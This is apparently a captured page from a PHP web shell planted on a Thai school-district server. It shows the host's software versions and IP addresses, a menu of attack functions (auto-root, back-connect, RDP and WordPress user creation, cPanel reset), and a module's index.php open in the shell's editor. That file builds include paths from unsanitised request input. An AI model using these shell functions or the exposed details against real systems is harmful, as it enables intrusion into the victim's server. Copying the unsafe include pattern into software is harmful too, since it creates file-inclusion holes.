Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
school_gis /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
install
[ DIR ]
drwxr-xr-x
main
[ DIR ]
drwxr-xr-x
default.php
342
B
-rw-r--r--
index.php
2.26
KB
-rw-r--r--
json.php
4.68
KB
-rw-r--r--
menu.php
1.98
KB
-rw-r--r--
menu_mobile.php
803
B
-rw-r--r--
route.php
9.09
KB
-rw-r--r--
select-route.php
1.59
KB
-rw-r--r--
setmap-school.php
323
B
-rw-r--r--
setmap.php
6.95
KB
-rw-r--r--
view.php
11.38
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<style type="text/css"> @font-face { font-family: 'Sarabun'; src:url('font/Sarabun.ttf.woff') format('woff'), url('font/Sarabun.ttf.svg#Sarabun') format('svg'), url('font/Sarabun.ttf.eot'), url('font/Sarabun.ttf.eot?#iefix') format('embedded-opentype'); font-weight: normal; font-style: normal; } </style> <!-- Bootstrap Include --> <link rel="stylesheet" type="text/css" href="./bootstrap-3.3.5-dist/css/bootstrap.min.css"> <link rel="stylesheet" type="text/css" href="./bootstrap-3.3.5-dist/css/datepicker.css"> <script src="./bootstrap-3.3.5-dist/js/jquery-1.11.3.min.js"></script> <script src="./bootstrap-3.3.5-dist/js/bootstrap.min.js"></script> <script src="./bootstrap-3.3.5-dist/js/bootstrap-confirmation.min.js"></script> <script src="./bootstrap-3.3.5-dist/js/bootstrap-datepicker.js"></script> <script src="./bootstrap-3.3.5-dist/js/jquery.dataTables.min.js"></script> <script src="./bootstrap-3.3.5-dist/js/dataTables.bootstrap.min.js "></script> <script src="./bootstrap-3.3.5-dist/js/bootstrap-select.min.js"></script> <link rel="stylesheet" type="text/css" href="./bootstrap-3.3.5-dist/css/bootstrap-select.min.css"> <!--script src="https://cdn.datatables.net/1.10.19/js/jquery.dataTables.min.js"></script> <script src="https://cdn.datatables.net/1.10.19/js/dataTables.bootstrap.min.js "></script--> <?php if(isset($_GET['index'])){ $index=$_GET['index']; } else{ $index=""; } //ผนวกเมนู if($_SESSION['user_os']=='mobile'){ $module_menu_path="./modules/".$_REQUEST['option']."/menu_mobile.php"; } else{ $module_menu_path="./modules/".$_REQUEST['option']."//menu.php"; } if(file_exists($module_menu_path)){ require_once("$module_menu_path"); } else{ die ("No MenuPage"); } //ผนวกไฟล์ if($task!=""){ $module_file_path="modules/$_REQUEST[option]/".$task; if(file_exists($module_file_path)){ require_once("$module_file_path"); }else{ die ("No Page"); } } else { $module_file_path="modules/$_REQUEST[option]/"."default.php"; if(file_exists($module_file_path)){ require_once("$module_file_path"); }else{ die ("No DefaultPage"); } } ?> <link rel="stylesheet" type="text/css" href="css/mm_training.css">
Close